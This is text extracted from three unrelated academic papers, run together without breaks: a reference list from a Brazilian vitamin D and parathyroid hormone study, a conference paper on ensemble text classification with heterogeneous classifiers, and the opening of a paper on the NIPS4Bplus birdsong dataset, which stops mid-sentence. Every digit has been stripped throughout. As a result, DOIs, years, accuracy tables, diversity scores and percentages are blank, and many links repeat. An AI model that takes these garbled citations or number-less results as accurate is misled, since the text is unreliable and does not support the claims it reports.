of hypovitaminosis d and secondary hyperparathyroidism in elders living in nonprofit homes in south brazil. endocrine – . (https://doi.org/ . /s - - - ) linhares er, jones da, round jm & edwards rht. effect of nutrition on vitamin d status: studies on healthy and poorly nourished brazilian children. american journal of clinical nutrition – . (https://doi.org/ . /ajcn/ . . ) al-ghamdi ma, lanham-new sa & kahn ja. differences in vitamin d status and calcium metabolism in saudi arabian boys and girls aged to years: effects of age, gender, extent of veiling and physical activity with concomitant implications for bone health. public health nutrition – . (https://doi.org/ . / s ) kiani ra, asad mj, abbasi s, farooq n & khan mu. prevalence of vitamin-d deficiency in urban population: a retrospective analysis. annals of pakistan institute of medical sciences – . santos ho, howell s, nichols k & teixeira fj. reviewing the evidence on vitamin d supplementation in the management of testosterone status and its effects on male reproductive system (testis and prostate): mechanistically dazzling but clinically disappointing. clinical therapeutics e –e . (https://doi.org/ . /j. clinthera. . . ) pilz s, frisch s, koertke h, kuhn j, dreier j, obermayer-pietsch b, wehr e & zittermann a. effect of vitamin d supplementation on testosterone levels in men. hormone and metabolic research – . (https://doi.org/ . /s- - ) wehr e, pilz s, boehm bo, märz w & obermayer-pietsch b. association of vitamin d status with serum androgen levels in men. clinical endocrinology – . (https://doi.org/ . / j. - . . .x) iyengar r, maceda c, beebe h, crowley l, woodward m, bar- chama n & mclaughlin ma. mp - association between testosterone, vitamin d and cardiovascular risk. journal of urology e . (https://doi.org/ . /j.juro. . . ) santos araújo epd, queiroz djm, neves jpr, lacerda lm, gonçalves mdcr & carvalho at. prevalence of hypovitaminosis d and associated factors in adolescent students of a capital of northeastern brazil. nutricion hospitalaria – . (https://doi.org/ . /nh. ) bell nh, epstein s, greene a, shary j, oexmann mj & shaw s. evidence for alteration of the vitamin d-endocrine system in obese subjects. journal of clinical investigation – . (https:// doi.org/ . /jci ) compston je, vedi s, ledger je, webb a, gazet jc & pilkington tr. vitamin d status and bone histomorphometry in gross obesity. american journal of clinical nutrition – . (https:// doi.org/ . /ajcn/ . . ) eloi m, horvath dv, szejnfeld vl, ortega jc, rocha dac, szejnfeld j & castro chm. vitamin d deficiency and seasonal variation over the years in são paulo, brazil. osteoporosis international – . (https://doi.org/ . /s - - -z) fang f, wei h, wang k, tan l, zhang w, ding l, liu t, shan z & zhu m. high prevalence of vitamin d deficiency and influencing factors among urban and rural residents in tianjin, china. archives of osteoporosis . (https://doi.org/ . /s - - - ) choi hs, oh hj, choi h, choi wh, kim jg, kim km, kim kj, rhee y & lim sk. vitamin d insufficiency in korea – a greater threat to younger generation: the korea national health and nutrition examination survey (knhanes) . journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) chen j, yun c, he y, piao j, yang l & yang x. vitamin d status among the elderly chinese population: a cross-sectional analysis of the – china national nutrition and health survey (cnnhs). nutrition journal . (https://doi.org/ . /s - - - . nurbazlin m, chee wss, rokiah p, alexander at, chew yy, nusaibah ars & chan sp. effects of sun exposure on (oh) vitamin d concentration in urban and rural women in malaysia. asia pacific journal of clinical nutrition – . (https://doi. org/ . /apjcn. . . . ) heere c, skeaff cm, waqatakirewa l, vatucawaqa p, khan an & green tj. serum -hydroxyvitamin d concentration of indigenous- fijian and fijian-indian women. asia pacific journal of clinical nutrition – . g r & gupta a. vitamin d deficiency in india: prevalence, causalities and interventions. nutrients – . (https://doi. org/ . /nu ) kimlin mg, lucas rm, harrison sl, van der mei i, armstrong bk, whiteman dc, kricker a, nowak m, brodie am & sun j. the contributions of solar ultraviolet radiation exposure and other this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://neo.sci.gsfc.nasa.gov/view.php?datasetid=aura_uvi_clim_m https://neo.sci.gsfc.nasa.gov/view.php?datasetid=aura_uvi_clim_m https://www.who.int/news-room/q-a-detail/ultraviolet-(uv)-index https://www.who.int/news-room/q-a-detail/ultraviolet-(uv)-index http://www.inmet.gov.br/portal/index.php?r=bdmep/bdmep http://www.inmet.gov.br/portal/index.php?r=bdmep/bdmep http://satelite.cptec.inpe.br/radiacao/ http://satelite.cptec.inpe.br/radiacao/ https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . / gm https://www.diasorin.com/en/node/ https://www.diasorin.com/en/node/ http://www.deqas.org/downloads/deqas% review% october% .pdf http://www.deqas.org/downloads/deqas% review% october% .pdf https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /peds. - https://doi.org/ . /peds. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /ajcn/ . . https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /j.clinthera. . . https://doi.org/ . /j.clinthera. . . https://doi.org/ . /s- - https://doi.org/ . /j. - . . .x https://doi.org/ . /j. - . . .x https://doi.org/ . /j.juro. . . https://doi.org/ . /nh. https://doi.org/ . /jci https://doi.org/ . /jci https://doi.org/ . /ajcn/ . . https://doi.org/ . /ajcn/ . . https://doi.org/ . /s - - -z https://doi.org/ . /s - - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /apjcn. . . . https://doi.org/ . /apjcn. . . . https://doi.org/ . /nu https://doi.org/ . /nu https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study : determinants to serum -hydroxyvitamin d concentrations in australian adults: the ausd study. american journal of epidemiology – . (https://doi.org/ . /aje/kwt ) ling y, lin h, aleteng q, ma h, pan b, gao j & gao x. cdx- polymorphism in vitamin d receptor gene was associated with serum -hydroxyvitamin d levels, bone mineral density and fracture in middle-aged and elderly chinese women. molecular and cellular endocrinology – . (https://doi.org/ . /j. mce. . . ) mezzavilla m, tomei s, alkayal f, melhem m, ali mm, al-arouj m, bennakhi a, alsmadi o & elkum n. investigation of genetic variation and lifestyle determinants in vitamin d levels in arab individuals. journal of translational medicine . (https://doi.org/ . / s - - - ) uitterlinden ag, fang y, van meurs jbj, pols hap & van leeuwen jptm. genetics and biology of vitamin d receptor polymorphisms. gene – . (https://doi.org/ . /j.gene. . . ) jiang x, kiel dp & kraft p. the genetics of vitamin d. bone – . (https://doi.org/ . /j.bone. . . ) nissen j, rasmussen lb, ravn-haren g, andersen ew, hansen b, andersen r, mejborn h, madsen kh & vogel u. common variants in cyp r and gc genes predict vitamin d concentrations in healthy danish children and adults. plos one e . (https://doi. org/ . /journal.pone. ) husain ne, badie suliman aa, abdelrahman i, bedri sa, musa rm, osman he, mustafa ah, gafer n, farah e, satir aa, et al. vitamin d level and its determinants among sudanese women: does it matter in a sunshine african country? journal of family medicine and primary care – . (https://doi.org/ . /jfmpc. jfmpc_ _ ) dirks nf, ackermans mt, lips p, de jongh rt, vervloet mg, de jonge r & heijboer ac. the when, what and how of measuring vitamin d metabolism in clinical medicine. nutrients . (https://doi.org/ . /nu . ferreira ce. consensus – reference ranges of vitamin d [ (oh)d] from the brazilian medical societies. brazilian society of clinical pathology/laboratory medicine (sbpc/ml) and brazilian society of endocrinology and metabolism (sbem). jornal brasileiro de patologia e medicina laboratorial – . filgueiras ms, suhett lg, silva ma, rocha np & de novaes jf. lower vitamin d intake is associated with low hdl cholesterol and vitamin d insufficiency/deficiency in brazilian children. public health nutrition – . (https://doi.org/ . / s ) peters bse, dos santos lc, fisberg m, wood rj & martini la. prevalence of vitamin d insufficiency in brazilian adolescents. annals of nutrition and metabolism – . (https://doi. org/ . / ) cembranel f, hallal alc, gonzález-chica da & d’orsi e. relação entre consumo alimentar de vitaminas e minerais, índice de massa corporal e circunferência da cintura: um estudo de base populacional com adultos no sul do brasil. cadernos de saúde pública e . (https://doi.org/ . / - x ) fisberg rm, marchioni dml, de castro ma, verly junior e, araújo mc, bezerra in, pereira ra & sichieri r. ingestão inadequada de nutrientes na população de idosos do brasil: inquérito nacional de alimentação – . revista de saúde pública (supplement ) s– s. (https://doi.org/ . /s - ) libon f, cavalier e & nikkels af. skin color is relevant to vitamin d synthesis. dermatology – . (https://doi. org/ . / ) xiang f, lucas r, de gruijl f & norval m. a systematic review of the influence of skin pigmentation on changes in the concentrations of vitamin d and -hydroxyvitamin d in plasma/serum following experimental uv irradiation. photochemical and photobiological sciences – . (https://doi.org/ . / c pp d) brazilian institute of geography and statistics. table – resident population by color or race and religion. rio de janeiro, brazil: ibge. (available at: https://sidra.ibge.gov.br/tabela/ #/n /all/n /all/ n /all/v/ /p/last% /c /allxt/c / /d/v % /l/v,p+c ,t+c /resultado) munns cf, shaw n, kiely m, specker bl, thacher td, ozono k, michigami t, tiosano d, mughal mz, mäkitie o, et al. global consensus recommendations on prevention and management of nutritional rickets. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) received in final form june accepted june accepted manuscript published online june this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /aje/kwt https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /j.gene. . . https://doi.org/ . /j.bone. . . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /jfmpc.jfmpc_ _ https://doi.org/ . /jfmpc.jfmpc_ _ https://doi.org/ . /nu https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . / https://doi.org/ . / https://doi.org/ . / - x https://doi.org/ . /s - https://doi.org/ . /s - https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /c pp d https://doi.org/ . /c pp d https://sidra.ibge.gov.br/tabela/ #/n /all/n /all/n /all/v/ /p/last% /c /allxt/c / /d/v % /l/v,p+c ,t+c /resultado https://sidra.ibge.gov.br/tabela/ #/n /all/n /all/n /all/v/ /p/last% /c /allxt/c / /d/v % /l/v,p+c ,t+c /resultado https://sidra.ibge.gov.br/tabela/ #/n /all/n /all/n /all/v/ /p/last% /c /allxt/c / /d/v % /l/v,p+c ,t+c /resultado https://doi.org/ . /jc. - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction method study design and data collection assay statistical analysis results discussion conclusion declaration of interest funding ethics approval and consent to participate consent for publication availability of data and material author contribution statement acknowledgements references international conference on sensor network and computer engineering (icsnce ) an ensemble learning method for text classification based on heterogeneous classifiers fan huimin school of computer science and engineering xi’an technological university xi’an, , china e-mail: @ qq.com li pengpeng school of computer science and engineering xi’an technological university xi’an, , china e-mail: m @ .com zhao yingze school of school of marxism xi'an jiaotong university xi’an, china e-mail: yingze @ .com li danyang school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—ensemble learning can improve the accuracy of the classification algorithm and it has been widely used. traditional ensemble learning methods include bagging, boosting and other methods, both of which are ensemble learning methods based on homogenous base classifiers, and obtain a diversity of base classifiers only through sample perturbation. however, heterogenous base classifiers tend to be more diverse, and multi-angle disturbances tend to obtain a variety of base classifiers. this paper presents a text classification ensemble learning method based on multi-angle perturbation heterogeneous base classifier, and validates the effectiveness of the algorithm through experiments. keywords-machine learning; ensemble learning; text classification i. introduction the main idea of ensemble learning is to generate multiple learners through certain rules and then adopt some integrated strategy to make the final decision[ ]. in general, multiple learners in the so-called ensemble learning are all homogenous “weak learners”. based on these weak learners, multiple learners are generated through sample set perturbation, and a strong learner is obtained after integration. with the deepening of integrated learning, its broad definition gradually accepted by scholars. it refers to a collection of multiple classifiers using learning methods, without distinction between the nature of the classifier。 however, the research of ensemble learning with homogenous classifiers is still the most common, and it is usually only perturbed by a single angle such as algorithm training set[ ][ ]. the random forest algorithm adds the perturbation of the classification attribute to the traditional bagging algorithm, and thus obtains a better classification effect[ ]. this shows that the multi-angle perturbation can produce a larger difference base learner, and the ensemble learning model has higher classification accuracy. in addition, the research shows that the diversity of base learners based on the heterogeneous base classifier is stronger, so the classification model has stronger classification accuracy and generalization performance[ ][ ]. therefore, this paper combines the above two factors and designs a text classification ensemble learning method based on multi-angle perturbation heterogeneous base classifier. international conference on sensor network and computer engineering (icsnce ) ii. ensemble learning "weak learning is equivalent to strong learning" is a theoretical issue raised by kearns and valiant in . the boosting algorithm arises from the proof of this issue. then the boosting algorithm derived a number of variants, including gradient boosting, lpboosting and so on. because of the characteristics of boosting that training classifiers serially, the training process takes up more resources and has lower efficiency. therefore, whether it is possible to use a few classifiers and obtain the same performance is a matter of concern to researchers. zhou zhihua and others on the "selective ensemble"[ ][ ] of boosting algorithm helped to overcome this problem. "selective ensemble" only used the classifier with has good classification results to integrate the classifiers. this idea can finish the construction of ensembled model more efficiently without changing the original algorithm that training base classifiers. in recent years, a method of selective integration based on clustering, selection, optimization and other methods has also been developed. the theoretical basis of ensemble learning shows that strongly learner and weak learner are equivalent, so we can find ways to convert weaker learners into strongly learners, without having to look for hard-to-find learner. currently there is a representative ensemble learning method boosting, bagging. the traditional bagging algorithm and boosting algorithm as well as many derived algorithms of the two algorithms are ensemble learning based on homogenous base classifier. and diversity is only obtained through sample disturbances, while multi-angle disturbances and heterogeneous classifiers can improve model classification accuracy. this paper first trains and integrates homogenous base classifiers, compares and analyzes changes in the accuracy of base classifiers and integrated models, and then integrates k-nearest neighbor classifiers, bayesian classifiers, and logistic regression classifiers in text classifiers. the integration model of the heterogeneous base classifier compares the diversity with the base classifier homogenous bagging algorithm to measure the kw value and accuracy. iii. ensemble learning model based on heterogeneous base classifier in order to obtain an integrated learning model with higher accuracy, more base classifiers with more diversity and good classification results should be obtained as much as possible. from the perspective of diversity, we can try to select a combination of many "attributes" from the variable factors in the classification process. here, "attribute" refers to everything that causes the change of the algorithm classification result. from the general process of text classification analysis, feature selection, feature dimension, classifier selection and classifier parameters can be used as a basis for the diversity of the classifier. for each classification model, its algorithm parameters, feature selection algorithm, feature dimension are disturbed. in this paper, many kinds of classifiers are integrated, and an integrated learning model based on multi-angle perturbation heterogeneous basis classifiers is designed. inputs in the process of model training are feature selection algorithm set s, feature dimension set n, classifier set c, adjustable parameter set a and parameter optional value set (dictionary) v. training steps are as follows: step : pre-process the sample set. step : select an algorithm for each feature, make a feature selection for each feature dimension, and add the feature selection result to the feature selection result list l. step : perform step for each classifier. step : train and save to the classifier list c-output for each parameter of the classifier in combination with eachresult in the l list. the output of the model is the classifier list c-output. the testing process of the model is as follows: after the pre-processing and the vectorization of the sample to be tested, a series of classification models are used to predict the samples to obtain a plurality of classification results. the majority of voting integration strategies lead to the final classification result. the feature selection algorithm, feature dimension, and classifier all serve as a source for the diversity of the base classifiers. in this paper, feature selection algorithm can use chi-square statistics, information gain and mutual international conference on sensor network and computer engineering (icsnce ) information algorithm. classifier perturbation can be trained by bayesian classifier, k-nearest neighbor classifier and logistic regression classifier. since the parameters of the classifier are also variables, they can also be used as disturbance variables. iv. experiment analysis the experiment uses sogou labs' entire network news dataset, and randomly selects news documents from five categories of financial, education, automotive, entertainment and women, and uses the body part and its category markers as the experimental text data set (balanced data set). the experiment will use % data as the training set and the rest as test sets. a. the impact of changes in featuredimensions. figure . experiment on the variation of feature dimension between integrated model and single classifier model with the increase of feature dimensions, the accuracy of each model is on the rise. when the number of features is small, the accuracy of the integrated model is only lower than that of the information gain algorithm. when the number of features exceeds , the integrated model performs best. it can be seen that the classification effect of the integrated model is not always better than that of a single classifier. when the feature dimension is small, the accuracy of the integrated model is lower than that of the information gain algorithm model. in the experimental results obtained from experimental data in this paper, when the feature dimension exceeds dimensions, the accuracy of the model tends to be stable, and the accuracy of ensemble learning model is always higher than that of a single classifier model. b. the effect of feature selection algorithm and classifiers table i. experiment ofthe perturbation of feature selection algorithm type feature selection algorithm classifier accuracy/% base classifier chi knn . ig . mi . ensembleclassifier above three kinds . base classifier chi bayesian . ig . mi . ensembleclassifier above three kinds . base classifier chi logistic regression . ig . mi . ensembleclassifier above three kinds . it can be seen from the experimental results that under the same conditions, the classification results of multiple classifiers combined with multiple feature selection algorithms are quite different. that is to say, the diversity between the base classifiers obtained by the perturbation feature selection algorithm is strong. therefore, a variety of feature selection algorithms can be used as one of the sources of the base classifiers. as can be seen from table , when the feature selection algorithm is chi-square statistics, information gain or mutual information algorithm, the classification accuracy of the single classifier is lower, and the accuracy of the integrated classifier classification is higher than that of any single classifier. the disturbance of classifier makes the algorithm vary greatly in accuracy, so the disturbance of classifier can also be used as one of the sources of the diversity of classifier. c. effect of classifier parameters due to the different settings of the base classifier parameters will lead to some differences between the training model, this paper designed experiments to further examine the accuracy of the basic learning model in the international conference on sensor network and computer engineering (icsnce ) disturbance of classifier parameters. the experimental results are shown in table - . table ii. parameter perturbation experiment of k nearest neighbor classifier type k classifier accuracy/% base classifier knn . . . . . ensemble classifier - - . table iii. perturbation experiment of bayesian classifier parameter type type of classifier classifier accuracy/% base classifier polynomial bayesian classifier . gaussian bernoulli . ensemble classifier - - . table iv. perturbation experiment of logistic regression classifier parameter type the way of classification loss function optimization method classifier accur acy/% base classifier one to many liblinear logistic regressio n . newton-cg . lbfgs . sag . multi-category newton-cg . lbfgs . sag . ensemble classifier - - - . from the data in table - found: compared with the above three groups of experiments, the k-nearest neighbor classifier has a strong diversity among the classifiers in the selection of "k value" and the bayesian classifier perturbation of the "classifier type" parameters. therefore, base classifiers with higher classification accuracy are candidates. however, the logistic regression classifier is insensitive to the two parameters of "classification method" and "loss function optimization method". the accuracy of the base classifier is almost constant and the diversity is lower. in the multi-angle perturbation integrated model, only one of the classifiers can be selected. d. multi-angle disturbance through the above three groups of experiments, we have screened the selected parameters of the base classifier with strong diversity. from the experimental data obtained from the above three experiments, the kw diversity measure between homogeneity classifiers that make up each classifier can be calculated as shown in table . table v. base classifier diversity measure kw value ensemble learning model disturb variable kw value knn feature selection algorithm . bayesian classifier . logistic regression classifier . chi classifier . ig . mi . knn k value . bayesian classifier classifier type . logistic regression classifier classification and optimization methods multiangle perturbation heterogeneous basis classifier multi-angle disturbance . the range of kw values is [ , ]. when kw is or , the base classifiers are the same, and there is no diversity among base classifiers. when kw is . , the base classifier has the highest diversity. as can be seen from table , the integrated models with the most diversity of base classifiers in table are all based on heterogeneous base classifiers. the kw value of this model is better than that based on the rest of the integrated learning models. international conference on sensor network and computer engineering (icsnce ) using the integrated method, the above feature selection algorithm, feature dimension, classifier and its parameters are taken as input to integrate all the base classifiers, and an integrated model based on multi-angle perturbation heterogeneous base classifiers is obtained. the multi-angle disturbance integrated learning model parameters are summarized in table . table vi. model parameters variable value / classifier classifier property value feature selection algorithm chi、ig、mi - characteristic dimension 、 、 - classifier bayesian classifier type: gaussian, bernoulli, polynomial classifier knn k= 、 、 classifier logistic regression classifier classification: one to many; optimization methods: sag the parameters shown in table are used as inputs to the model to train the integrated learning model designed in this paper. compare this model with the bagging text classification model with only sample perturbation. the experimental results are shown in table . table vii. the comparison between the model and bagging model model type variable classifier kw value accuracy/% bagging sample disturbance knn . bagging sample disturbance bayesian . . bagging sample disturbance logistic regression . heterogeneous classifier model multi-angle disturbance - . the experimental results show that the bagging algorithm based on k-nearest neighbor classifier has higher kw value, that is to say, the classifier has strong diversity but low accuracy. bagging algorithm based on bayesian classifier and logistic regression classifier has low kw value and accuracy, that is, the base classifier has less diversity and low accuracy. the integrated learning model based on multi-angle disturbance heterogeneous basis classifier designed in this paper has the highest classification accuracy and the strong diversity of base classifiers. v. conclusion this paper analyzes the algorithmic process of bagging and boosting, and finds that both of them are integrated learning strategies based on homogeneity classifier. at present, the research on heterogeneous base classifier integrated learning is less. in this paper, we design a learning model of multi-angle perturbation heterogeneous basis classifier. multi-angle perturbation of heterogeneous classifiers, and try to integrate them. the experimental results show that the integrated learning model based on multi-angle perturbation-based heterogeneous base classifiers proposed and designed in this paper has higher classification accuracy and rich base classifier diversity. this will provide an important basis for further research on heterogeneous classifier integration. references [ ] lai j h. ensemble learning for text classification[j]. . [ ] wang g, sun j, ma j, et al. sentiment classification: the contribution of ensemble learning[j]. decision support systems, , : - . [ ] xia r, zong c, li s. ensemble of feature sets and classification algorithms for sentiment classification[j]. information sciences, , ( ): - . [ ] jia j, liu z, xiao x, et al. psuc-lys: predict lysine succinylation sites in proteins with pseaac and ensemble random forest approach[j]. journal of theoretical biology, , : - . [ ] rodriguez j j, kuncheva l i, alonso c j. rotation forest: a new classifier ensemble method[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] wu z, lin w, zhang z, et al. an ensemble random forest algorithm for insurance big data analysis[c]//computational science and engineering (cse) and embedded and ubiquitous computing (euc), ieee international conference on. ieee, , : - . [ ] li n, jiang y, zhou z h. multi-label selective ensemble[c]//international workshop on multiple classifier systems. springer, cham, : - . [ ] qian c, yu y, zhou z h. pareto ensemble pruning[c]//aaai. : - . submitted may accepted august published october corresponding author veronica morfi, g.v.morfi@qmul.ac.uk academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright morfi et al. distributed under creative commons cc-by . open access nips bplus: a richly annotated birdsong audio dataset veronica morfi , yves bas , , hanna pamuła , hervé glotin and dan stowell machine listening lab, centre for digital music (c dm), department of electronic engineering and computer science, queen mary university of london, london, united kingdom centre d’ecologie et des sciences de la conservation (cesco), muséum national d’histoire naturelle, cnrs, sorbonne université, paris, france centre d’ecologie fonctionnelle et evolutive (cefe), cnrs, université de montpellier, université paul-valéry montpellier, montpellier, france department of mechanics and vibroacoustics, agh university of science and technology, kraków, poland cnrs, lis, dyni team, sabiod, université de toulon (utln), aix marseille université (amu), marseille, france abstract recent advances in birdsong detection and classification have approached a limit due to the lack of fully annotated recordings. in this paper, we present nips bplus, the first richly annotated birdsong audio dataset, that is comprised of recordings containing bird vocalisations along with their active species tags plus the temporal annotations acquired for them. statistical information about the recordings, their species specific tags and their temporal annotations are presented along with example uses. nips bplus could be used in various ecoacoustic tasks, such as training models for bird population monitoring, species classification, birdsong vocalisation detection and classification. subjects bioinformatics, computational biology, data mining and machine learning, databases, multimedia keywords audio dataset, bird vocalisations, ecosystems, ecoacoustics, rich annotations, bioinformatics, audio signal processing, bioacoustics introduction the potential applications of automatic species detection and classification of birds from their sounds are many (e.g., ecological research, biodiversity monitoring, archival) (dawson & efford, ; lambert & mcdonald, ; drake et al., ; sovern et al., ; marques et al., ). in recent decades, there has been an increasing amount of ecological audio datasets that have tags assigned to them to indicate the presence or not of a specific bird species. utilising these datasets and the provided tags, many authors have proposed methods for bird audio detection (adavanne et al., ; pellegrini, ) and bird species classification, e.g., in the context of lifeclef classification challenges (goëau et al., ; goëau et al., ) and more (salamon & bello, ; knight et al., ). however, these methods do not predict any information about the temporal location of each event or the number of its occurrences in a recording. some research has been made into using audio tags in order to predict temporal annotations, labels that contain temporal information about the audio events. this is usually done in a multi-instance learning (mil) or weakly supervised learning setting. in (briggs et al., ; ruiz-muñoz, orozco-alzate & castellanos-dominguez, ), the how to cite this article morfi v, bas y, pamuła h, glotin h, stowell d. . nips bplus: a richly annotated birdsong audio dataset. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mailto:g.v.morfi@qmul.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. authors try to exploit audio tags in birdsong detection and bird species classification, in (fanioudakis & potamitis, ), the authors use deep networks to tag the temporal location of active bird vocalisations, while in (roger et al., ), the authors propose a bioacoustic segmentation based on the hierarchical dirichlet process (hdp-hmm) to infer song units in birdsong recordings. furthermore, some methods for temporal predictions by using tags have been proposed for other types of general audio (schlüter, ; adavanne & virtanen, ; kumar & raj, ). however, in all the above cases some kind of temporal annotations were used in order to evaluate the performance of the methods. hence, acquiring temporal annotations is vital even for methods that are in a weakly supervised learning setting. in the field of automatic birdsong monitoring, advances in birdsong detection and classification have approached a limit due to the lack of fully annotated datasets. annotating ecological data with temporal annotations to train sound event detectors and classifiers is a time consuming task involving a lot of manual labour and expert annotators. there is a high diversity of animal vocalisations, both in the types of the basic syllables and in the way they are combined (s. brandes, ; kroodsma, ). also, there is noise present in most habitats, and many bird communities contain multiple bird species that can potentially have overlapping vocalizations (luther, ; luther & wiley, ; pacifici, simons & pollock, ). these factors make detailed annotations laborious to gather, while on the other hand acquiring audio tags takes much less time and effort, since the annotator has to only mark the active sound event classes in a recording and not their exact boundaries. this means that many ecological datasets lack temporal annotations of bird vocalisations even though they are vital to the training of automated methods that predict the temporal annotations which could potentially solve the issue of needing a human annotator. recently, birdvox-full-night (lostanlen et al., ), a dataset containing some temporal and frequency information about flight calls of nocturnally migrating birds, was released. however, birdvox-full-night only focuses on avian flight calls, a specific type of bird calls, that usually have a very short duration in time. the temporal annotations provided for them do not include any onset, offset or information about the duration of the calls, they simply contain a single time marker at which the flight call is active. additionally, there is no distinction between the different bird species, hence no specific species annotations are provided, but only the presence of flight calls through the duration of a recording is denoted. hence, the dataset can provide data to train models for flight call detection but is not efficient for models performing both event detection and classification for a variety of bird vocalisations. in this paper, we introduce nips bplus, the first ecological audio dataset that contains bird species tags and temporal annotations. nips bplus contains temporal annotations for the recordings that comprised the training set of the neural information processing scaled for bioacoustics (nips b) challenge for bird song classification (http://sabiod.univ-tln.fr/nips b/challenge .html) that are accessible at figshare (https://doi.org/ . /m .figshare. ) (morfi, stowell & pamuła, ). nips bplus can be used for training supervised automated methods that perform bird morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sabiod.univ-tln.fr/nips b/challenge .html https://doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. table some of the latest and most frequently used datasets in tasks related to bird song classification and detection. #recs denotes the num- ber of recordings in the dataset; #classes denotes the numbers of classes in each dataset; species tags indicates if there are species specific labels in the recordings stating the presence of specific species in them; annotations denotes the presence of temporal annotations in recordings; duration de- notes the approximate duration of each dataset in hours; and other info provides additional information about the characteristics of the dataset. dataset name #recs #classes species tags annotations duration other info nips bplus yes yes h freefield , n/a no no h bird/no-bird tags warblrb k , n/a no no h bird/no-bird tags birdvox-dcase- k , n/a no no h bird/no-bird tags chernobyl , n/a no no h bird/no-bird tags polandnfc , n/a no no h bird/no-bird tags lifeclef(birdclef) , yes no h from xeno-canto lifeclef(birdclef) , yes no h from xeno-canto birdvox-full-night no yes h points in time vocalisation detection and classification and can also be used for evaluating methods that use only audio tags or no annotations for training. table presents an overview comparison between nips plus and the most recent and frequently used datasets in tasks related to bird vocalisation classification and detection. during the detection and classifiaction of acoustic scenes and events, the (dcase) challenge the freefield , warblrb k, birdvox-dcase- k (deriving from birdvox-full-night (https://wp.nyu.edu/birdvox/birdvox-full-night/)), chernobyl and polandnfc datasets were used in task for bird audio detection, namely detecting the presence of any bird in a recording and assigning a file format with the presence of any bird in a recording and assigning a binary label ( :bird, :no-bird) to it (http://dcase.community/challenge /task-bird-audio-detection). another very widely known challenge that addresses the task of active bird species identification in a recording is birdclef, which has been part of the lifeclef challenge since (https://www.imageclef.org/lifeclef ). finally, birdvox-full-night presented in (lostanlen et al., ), is a dataset of ten hours of night calls annotated as single points in time instead of continuous events, due to the short duration of night calls in the dataset. the datasets used in birdclef derive from xeno-canto, the largest publicly available bird sound database, that contains over , recordings of more than , different bird species (https://www.xeno-canto.org/). another bird sound database presented in (arriaga et al., ), that has been open to the public since , is bird- db (http://taylor .biology.ucla.edu/birddbquery/). bird-db consists of more than recordings from over different bird species. in contrast to xeno-canto that only provides tags of the recordings with the bird species present in it, the recordings in bird-db include temporal annotations identifying the bird species and also classifying the vocalisation. even though bird-db provides temporal annotation, it is meant to be used as a database and is not very convenient as a dataset. this is mainly due to the fact that any user can upload recordings and their annotations, additionally, each recording and annotation pair needs to be downloaded separately. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://wp.nyu.edu/birdvox/birdvox-full-night/ http://dcase.community/challenge /task-bird-audio-detection https://www.imageclef.org/lifeclef https://www.xeno-canto.org/ http://taylor .biology.ucla.edu/birddbquery/ http://dx.doi.org/ . /peerj-cs. the rest of the paper is structured as follows: audio data collection describes the process of collecting and selecting the recordings comprising the dataset, annotations presents our approach of acquiring the tags and temporal annotations and provides statistical information about the labels and recordings comprising the dataset followed by example uses of nips bplus and conclusion. audio data collection the recordings that comprise the nips b training and testing dataset were collected by recorders placed in different locations, which can be summarised by seven regions in france and spain. twenty percent of the recordings were collected from the haute-loire region in central france, % of them were collected from the pyrénées-orientales, aude and hérault regions in south-central france along the mediterranean cost and the remaining % of the recordings originated from the granada, jaén and almeria regions in eastern andalusia, spain. the haute-loire area is a more hilly and cold region, while the rest of the regions are mostly along the mediterranean coast and have a more mediterranean climate. the recorders used were the sm bat (https://bit.ly/ rbf cd) using smx-us microphones (https://www.wildlifeacoustics.com/images/pdfs/ultrasonicmicrophones. pdf), both produced by wildlife acoustics (https://www.wildlifeacoustics.com/). they were originally put in the field for bat echolocation call sampling, but they were also set to record for h single channel at . khz sampling rate starting min after sunrise, right after bat sampling. the recorders were set to a db signal-to-noise ratio (snr) trigger with a window of s, and acquired recordings only when the trigger was activated. approximately h of field recordings were collected. any recording longer than s was split into multiple s files. sonochiro, a chirp detection tool used for bat vocalisation detection, was used on each file to identify recordings with bird vocalisations (http://www.leclub-biotope.com/fr/ -sonochiro). a stratified random sampling was then applied to all acquired recordings, based on locations and clustering of features, to maximise the diversity in the labelled dataset, resulting in nearly , files being chosen. following the first stage of selection, manual annotations were produced for the classes active in these , files and any recordings that contained unidentified species’ vocalisations were discarded. furthermore, the training set and testing set 